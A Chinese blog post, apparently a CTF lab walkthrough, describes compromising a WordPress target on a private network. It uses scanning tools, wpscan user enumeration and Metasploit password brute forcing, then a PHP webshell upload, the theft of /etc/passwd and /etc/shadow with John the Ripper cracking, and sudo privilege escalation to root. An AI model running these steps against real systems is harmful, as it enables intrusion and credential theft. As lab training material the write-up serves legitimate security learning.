• CTF—攻防练习之HTTP—暴力破解


    攻击机:192.168.32.152

    靶机:192.168.32.164

    首先nmap,nikto -host ,dirb 扫描开放带端口,探测敏感文件,扫描目录

    开放了21,22,80端口,看到一个敏感目录secret

    打开发现访问里面界面会跳转 

    vitcsec,但是打不开,设置一下host

    gedit /etc/hosts

    即可直接访问网页中内容

    打开login

    我们可以用metasploit对此进行暴力破解
    use auxiliary/scanner/http/wordpress_login_enum
    set username XX
    set passfile /usr/share/wordlists/dirb/common.txt
    set targeturi /secret/
    set rhosts 192.168.32.164
    exploit

    我们暴力破解前不知道user,我们可以先用wpscan确认一下user

    wpscan --url www.vtcsec.com/secret/ --enumerate u 
    确认user为admin

    利用msfconsole开始暴力破解:
    跑出密码也为admin,登录上去,找到上传点,制作一个phpwebshell,上传上去
    再执行此shell
    http://192.168.32.164/secret/wp-content/themes/twentyseventeen/archive.php
    成功拿到shell!

    此时再想办法提权

    这里我们可以用返回shell下载passwd和shadow文件,再把文件转换为cracked用john破解出密码

    download /etc/passwd
    download /etc/shadow

    unshadow passwd shadow > cracked

    john cracked
    得到用户marlinspike,密码也是marlinspike

    再返回shell界面,开启终端 python -c "import pty;pty.spawn('/bin/bash')"
    提权

    su -marlinspile
    sudo -l
    sudo bash  最中得到root权限

  • 相关阅读:
    前端接收后端返回数据中【后端返回数据
    JavaSE 文件部分常用功能示例
    springboot controller路径名设置
    springboot 文档学习记录
    controller 方法路径、参数的使用
    Vue制作音乐播放器_基于网易云音乐的接口
    Java复习_枚举
    Java复习_static用例_单例模式_懒汉式
    c++和python中的sort
    通过portainer来管理容器和镜像
  • 原文地址:https://www.cnblogs.com/zhaoyixiang/p/11055545.html
Copyright © 2020-2023  润新知